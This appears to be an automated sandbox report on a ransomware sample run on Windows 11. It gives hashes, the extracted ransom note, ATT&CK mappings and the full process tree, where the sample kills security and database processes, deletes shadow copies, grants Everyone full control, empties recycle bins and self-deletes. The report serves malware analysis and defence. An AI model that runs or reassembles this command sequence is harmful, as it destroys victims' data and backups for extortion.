Overview

overview

10

Static

static

7

Mydoom/00b...f7.exe

windows11-21h2-x64

1

Mydoom/055...81.exe

windows11-21h2-x64

Mydoom/0b7...c5.exe

windows11-21h2-x64

8

Mydoom/0d5...64.exe

windows11-21h2-x64

10

Mydoom/176...9c.exe

windows11-21h2-x64

7

Mydoom/1fe...81.exe

windows11-21h2-x64

7

Mydoom/233...98.exe

windows11-21h2-x64

7

Mydoom/252...03.exe

windows11-21h2-x64

7

Mydoom/2af...b2.exe

windows11-21h2-x64

7

Mydoom/3d9...64.exe

windows11-21h2-x64

7

Mydoom/3db...e5.exe

windows11-21h2-x64

7

Mydoom/493...dc.exe

windows11-21h2-x64

7

Mydoom/4d6...08.exe

windows11-21h2-x64

7

Mydoom/564...2a.exe

windows11-21h2-x64

7

Mydoom/6c3...4c.exe

windows11-21h2-x64

7

Mydoom/6c3...c3.exe

windows11-21h2-x64

7

Mydoom/771...20.exe

windows11-21h2-x64

7

Mydoom/7bc...61.exe

windows11-21h2-x64

7

Mydoom/8e9...88.exe

windows11-21h2-x64

7

Mydoom/9a7...60.exe

windows11-21h2-x64

7

Mydoom/9e0...f3.exe

windows11-21h2-x64

7

Mydoom/Myd...06.exe

windows11-21h2-x64

10

Mydoom/Myd...5c.exe

windows11-21h2-x64

6

Mydoom/Myd...fc.exe

windows11-21h2-x64

10

Mydoom/Myd...59.exe

windows11-21h2-x64

1

Mydoom/Myd...64.exe

windows11-21h2-x64

7

Mydoom/Myd...76.exe

windows11-21h2-x64

10

Mydoom/a9a...0f.exe

windows11-21h2-x64

7

Mydoom/b4a...95.exe

windows11-21h2-x64

7

Mydoom/c03...ef.exe

windows11-21h2-x64

8

Mydoom/c45...24.exe

windows11-21h2-x64

7

Mydoom/d42...06.exe

windows11-21h2-x64

7

Resubmissions

12-06-2024 08:28

240612-kcy2jawckj 10

10-06-2024 17:27

240610-v1ktxsvbpk 10

Analysis

  • max time kernel
    18s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240426-en
  • resource tags

    arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    10-06-2024 17:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Mydoom/Mydoom Ransomwares/5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe

  • Size

    100KB

  • MD5

    7fdd3bf8886199e8336f95c88bcaa49a

  • SHA1

    77e2019093379de4d5de07dbcf5893831c9bb7ec

  • SHA256

    5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc

  • SHA512

    9d774eca21fb33f26991cf20f0f6a2f0bce56aa4cc3d17fd769e0bb767ca400cd5c8dd64bb62db23bf5bc112b91b1a26db7bf2f9d85993cb990be5113e527a40

  • SSDEEP

    1536:1zmSA404oATJVPHEMXMxa6CO3/k/hdXVyczH+95DfFFjfuEnm:1zxEYsZaLhdlo95DfFFjfuCm

Score
10/10
discoveryevasionexecutionpersistenceransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt

Ransom Note
All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail [email protected] or: [email protected] (Backup mail) Send us this file RESTORE_FILES_INFO ================================================================================================================= Free decryption as a guarantee Before paying, you can send 1-2 files for free decryption. File format: txt doc pdf jpeg jpg gif png bmp Total file size should not exceed 2 MB (without archive) ====================================================== You can buy Bitcoins here: https://localbitcoins.com Or use the search how to buy Bitcoins in your country ================================================================================================================= IMPORTANT!!! Remember that your files are encrypted and only WE can recover them! Do not try to recover yourself, as well as on third-party resources, you will lose your files and money forever! ================================================================================================================= Key Identifier: my3sl9Yq1PK+YbpDrFH8dPMJiCTTIkoWj/yeg716ne9MGia5ULFpc1Mgi7UiDTNp+7VO9+bbcF20nkvmv4LXT82iki6X0cXcUljnVrLG3vrYOQU3Pdkxa2glJfh/wYlgW8zetKm8uyH+XkP2NfkCwdcmPcEXivuNCZ8NspdXPYYy6S9bZnmIYedqOW84j7MIPJJk/Tinm31hZCDMyLRlo46ya6LBvofFnhxoT+/zf3RYEV66ZJ5g+VCGpuxKtwdjwndHqtrSCT3G4vpsCKpoZnrLyl6TvDQFUfmIX2himhp269YuId2sr/nd6O6sqdxTyoX5GJa0ymznfE1wD2HjNLM5NlnzAGJC93rx5Jyf4sRwADl08PK2w1TYG0VL2zZ//zX8OShiL0lwD4nWSyD4cjaENLubeHu+eZlcI45FPARHfKzId3vuJm/uS01nK45yJ1br7TEFqgni3pFzdJVp2w15SMV2T7wbTgBXC95vMdnWKu0M6J7UbILMDl2X7KAhuyi+wtIQmROyFM2Sj6Nqy6uuFAt++6kqHmEhYjzcYY1oXPSB7JP6sD0PK/KZPfP/fI2Ly8RFyCTerzRSrwji/E61a7Dy248gYYWkMcd9U8UI9+jRTm+ySlp/a3ntEl2dQK1wLmB49aeBn+gXsf/b7DcwSzORCjOahyfssYHIJdo= Number of files that were processed is: 1095 PC Hardware ID: 3EBBE295

Signatures

  • Disables service(s) 3 TTPs
    evasionexecution
  • Modifies Windows Firewall 2 TTPs 4 IoCs
    evasion
  • Drops startup file 1 IoCs
  • Modifies file permissions 1 TTPs 3 IoCs
    discovery
  • Modifies WinLogon 2 TTPs 2 IoCs
    persistence
  • Drops file in Windows directory 10 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 48 IoCs
    evasion
  • Modifies registry key 1 TTPs 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs
    evasion
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\Mydoom\Mydoom Ransomwares\5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe
    "C:\Users\Admin\AppData\Local\Temp\Mydoom\Mydoom Ransomwares\5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe"
    1⤵
    • Drops startup file
    • Modifies WinLogon
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:4980
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill" /F /IM RaccineSettings.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:4484
    • C:\Windows\SYSTEM32\reg.exe
      "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
      2⤵
        PID:804
      • C:\Windows\SYSTEM32\reg.exe
        "reg" delete HKCU\Software\Raccine /F
        2⤵
        • Modifies registry key
        PID:4232
      • C:\Windows\SYSTEM32\schtasks.exe
        "schtasks" /DELETE /TN "Raccine Rules Updater" /F
        2⤵
          PID:3604
        • C:\Windows\SYSTEM32\sc.exe
          "sc.exe" config Dnscache start= auto
          2⤵
          • Launches sc.exe
          PID:4412
        • C:\Windows\SYSTEM32\sc.exe
          "sc.exe" config FDResPub start= auto
          2⤵
          • Launches sc.exe
          PID:1840
        • C:\Windows\SYSTEM32\sc.exe
          "sc.exe" config SSDPSRV start= auto
          2⤵
          • Launches sc.exe
          PID:3692
        • C:\Windows\SYSTEM32\netsh.exe
          "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
          2⤵
          • Modifies Windows Firewall
          PID:2156
        • C:\Windows\SYSTEM32\sc.exe
          "sc.exe" config upnphost start= auto
          2⤵
          • Launches sc.exe
          PID:2964
        • C:\Windows\SYSTEM32\sc.exe
          "sc.exe" config SQLTELEMETRY start= disabled
          2⤵
          • Launches sc.exe
          PID:3404
        • C:\Windows\SYSTEM32\sc.exe
          "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
          2⤵
          • Launches sc.exe
          PID:3348
        • C:\Windows\SYSTEM32\sc.exe
          "sc.exe" config SQLWriter start= disabled
          2⤵
          • Launches sc.exe
          PID:1588
        • C:\Windows\SYSTEM32\sc.exe
          "sc.exe" config SstpSvc start= disabled
          2⤵
          • Launches sc.exe
          PID:2400
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM mspub.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1880
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM firefoxconfig.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1532
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM excel.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4616
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM CNTAoSMgr.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3048
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM mydesktopqos.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:696
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM agntsvc.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1652
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM mydesktopservice.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1156
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM sqlwriter.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2620
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM thebat.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1676
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM mysqld.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3432
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM tbirdconfig.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2648
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM steam.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2296
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM sqbcoreservice.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3976
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM dbeng50.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4596
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM thebat64.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:656
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM encsvc.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2744
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" IM thunderbird.exe /F
          2⤵
          • Kills process with taskkill
          PID:1548
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM dbsnmp.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:5072
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM ocomm.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1896
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM isqlplussvc.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3476
        • C:\Windows\SYSTEM32\netsh.exe
          "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
          2⤵
          • Modifies Windows Firewall
          PID:3840
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM xfssvccon.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3924
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM infopath.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1412
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM onenote.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3144
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM mspub.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4192
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM mbamtray.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1804
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM PccNTMon.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:5060
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM Ntrtscan.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:5052
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM zoolz.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1800
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM msaccess.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:548
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM tmlisten.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2436
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM mydesktopservice.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2932
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM outlook.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2172
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM msftesql.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:848
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM winword.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2892
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM ocautoupds.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4604
        • C:\Windows\SYSTEM32\arp.exe
          "arp" -a
          2⤵
            PID:2432
          • C:\Windows\SYSTEM32\taskkill.exe
            "taskkill.exe" /IM mysqld-nt.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3952
          • C:\Windows\SYSTEM32\taskkill.exe
            "taskkill.exe" /IM powerpnt.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1380
          • C:\Windows\SYSTEM32\taskkill.exe
            "taskkill.exe" /IM ocssd.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1080
          • C:\Windows\SYSTEM32\taskkill.exe
            "taskkill.exe" /IM mydesktopqos.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2392
          • C:\Windows\SYSTEM32\taskkill.exe
            "taskkill.exe" /IM wordpad.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4992
          • C:\Windows\SYSTEM32\taskkill.exe
            "taskkill.exe" /IM oracle.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4176
          • C:\Windows\SYSTEM32\taskkill.exe
            "taskkill.exe" /IM visio.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1852
          • C:\Windows\SYSTEM32\taskkill.exe
            "taskkill.exe" /IM mysqld-opt.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:5096
          • C:\Windows\SYSTEM32\taskkill.exe
            "taskkill.exe" /IM sqlagent.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1424
          • C:\Windows\SYSTEM32\taskkill.exe
            "taskkill.exe" /IM sqlservr.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1900
          • C:\Windows\SYSTEM32\taskkill.exe
            "taskkill.exe" /IM sqlbrowser.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2284
          • C:\Windows\SYSTEM32\taskkill.exe
            "taskkill.exe" /IM synctime.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1568
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3728
          • C:\Windows\SYSTEM32\icacls.exe
            "icacls" "C:*" /grant Everyone:F /T /C /Q
            2⤵
            • Modifies file permissions
            PID:1672
          • C:\Windows\SYSTEM32\icacls.exe
            "icacls" "D:*" /grant Everyone:F /T /C /Q
            2⤵
            • Modifies file permissions
            PID:2520
          • C:\Windows\SYSTEM32\icacls.exe
            "icacls" "Z:*" /grant Everyone:F /T /C /Q
            2⤵
            • Modifies file permissions
            PID:3620
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
            2⤵
              PID:1720
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /c rd /s /q D:\\$Recycle.bin
              2⤵
                PID:4316
              • C:\Windows\SYSTEM32\netsh.exe
                "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
                2⤵
                • Modifies Windows Firewall
                PID:3920
              • C:\Windows\SYSTEM32\netsh.exe
                "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
                2⤵
                • Modifies Windows Firewall
                PID:4140
              • C:\Windows\System32\notepad.exe
                "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
                2⤵
                • Opens file in notepad (likely ransom note)
                PID:4100
              • C:\Windows\SYSTEM32\cmd.exe
                "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                2⤵
                  PID:5096
                  • C:\Windows\system32\PING.EXE
                    ping 127.0.0.7 -n 3
                    3⤵
                    • Runs ping.exe
                    PID:4644
                  • C:\Windows\system32\fsutil.exe
                    fsutil file setZeroData offset=0 length=524288 “%s”
                    3⤵
                      PID:2592
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Mydoom\Mydoom Ransomwares\5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe
                    2⤵
                      PID:396
                      • C:\Windows\system32\choice.exe
                        choice /C Y /N /D Y /T 3
                        3⤵
                          PID:252

                    Network

                    MITRE ATT&CK Matrix ATT&CK v13

                    Initial Access

                    Execution

                    System Services

                    1
                    T1569

                    Service Execution

                    1
                    T1569.002

                    Persistence

                    Create or Modify System Process

                    2
                    T1543

                    Windows Service

                    2
                    T1543.003

                    Boot or Logon Autostart Execution

                    1
                    T1547

                    Winlogon Helper DLL

                    1
                    T1547.004

                    Privilege Escalation

                    Create or Modify System Process

                    2
                    T1543

                    Windows Service

                    2
                    T1543.003

                    Boot or Logon Autostart Execution

                    1
                    T1547

                    Winlogon Helper DLL

                    1
                    T1547.004

                    Defense Evasion

                    Impair Defenses

                    1
                    T1562

                    Disable or Modify System Firewall

                    1
                    T1562.004

                    File and Directory Permissions Modification

                    1
                    T1222

                    Modify Registry

                    3
                    T1112

                    Credential Access

                    Discovery

                    System Information Discovery

                    1
                    T1082

                    Remote System Discovery

                    1
                    T1018

                    Query Registry

                    1
                    T1012

                    Lateral Movement

                    Collection

                    Exfiltration

                    Command and Control

                    Impact

                    Service Stop

                    1
                    T1489

                    Resource Development

                    Reconnaissance

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\ProgramData\Microsoft\Search\Data\Applications\Windows\edbres00002.jrs.[ID-3EBBE295].[[email protected]].CRYSTAL
                      Filesize

                      1024KB

                      MD5

                      3b0ece53c6aad8f9cd08bd7db0823425

                      SHA1

                      e5b4e9b394bef01cafa077430270bbc4715e3455

                      SHA256

                      58719df28ab4d8b14bfb11fcb67a32ffbf8eb008ba8e9470f98e4efbda2ec87d

                      SHA512

                      41a984a088c5871f01e72ca8fa0e013899e04e22998a872f517a9a0b5878b48cc8f07f1031f32e3e7291ef76ec664a5814ac313721f6211c175d1590e04dba29

                      Download Submit
                    • C:\ProgramData\Package Cache\{2BB73336-4F69-4141-9797-E9BD6FE3980A}v64.8.8795\dotnet-host-8.0.2-win-x64.msi.[ID-3EBBE295].[[email protected]].CRYSTAL
                      Filesize

                      728KB

                      MD5

                      c1b33ac17ed5aa21146b14cbbbe35e93

                      SHA1

                      a76ae4b5fd5747b0ed4015e7a7b3340326dd5de3

                      SHA256

                      81f314a7090de423ff0514701f97acc4849be1afb54733f1b40b2bb88de68141

                      SHA512

                      9ed4db9e878eb78e085ce12bacc9956d3757d7e717e85e4931c59a426fccafc067917e1af56eb59eeee702b887f571e267ca8da4d77579cbc5da23337ec71585

                      Download Submit
                    • C:\ProgramData\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.[ID-3EBBE295].[[email protected]].CRYSTAL
                      Filesize

                      180KB

                      MD5

                      f5fdeabf3ff6ea3eba22d1e171e55e1a

                      SHA1

                      c948221370f93105131328788ede7e5355c18748

                      SHA256

                      5a4398fbd684c81972b7f9d589a96af02e55e0e713803168d263b8cb1087b96f

                      SHA512

                      8906266ce09530ca8c0472b5ac7cfbaf707d1d3510d0017e92890e9b23c1bc51c1f18d7df5b24dbd406c8221bd323d2c0792d73f074cec33ded3e107ebbb6f3e

                      Download Submit
                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ujjebxsp.cni.ps1
                      Filesize

                      60B

                      MD5

                      d17fe0a3f47be24a6453e9ef58c94641

                      SHA1

                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                      SHA256

                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                      SHA512

                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                      Download Submit
                    • C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
                      Filesize

                      1KB

                      MD5

                      3ea5976c5d4ce4d661ca7dedaad98eb2

                      SHA1

                      70856a88756c1b2ee0d8a7132d0c0f503bf9e5bc

                      SHA256

                      dde35a10d7dfd2f9fba9f087a9a673d698f8fa95baa8051ddfaaf5e0879b4523

                      SHA512

                      75d9f06080834e885830995e39ace35b5c87c7ab215620e43e6d9795c9ed4234d9c6c0f57bf3cbf6b1ec9aba8a9fd32715a49fe0673f16a92e4aa21281e378b3

                      Download Submit
                    • memory/3728-11-0x000002AEB86C0000-0x000002AEB86E2000-memory.dmp
                      Filesize

                      136KB

                      Download
                    • memory/4980-0-0x00000000001B0000-0x00000000001D0000-memory.dmp
                      Filesize

                      128KB

                      Download
                    • memory/4980-1-0x00007FFF466D3000-0x00007FFF466D5000-memory.dmp
                      Filesize

                      8KB

                      Download
                    • memory/4980-2-0x00007FFF466D0000-0x00007FFF47192000-memory.dmp
                      Filesize

                      10.8MB

                      Download
                    • memory/4980-602-0x00007FFF466D3000-0x00007FFF466D5000-memory.dmp
                      Filesize

                      8KB

                      Download
                    • memory/4980-603-0x00007FFF466D0000-0x00007FFF47192000-memory.dmp
                      Filesize

                      10.8MB

                      Download
                    • memory/4980-605-0x00007FFF466D0000-0x00007FFF47192000-memory.dmp
                      Filesize

                      10.8MB

                      Download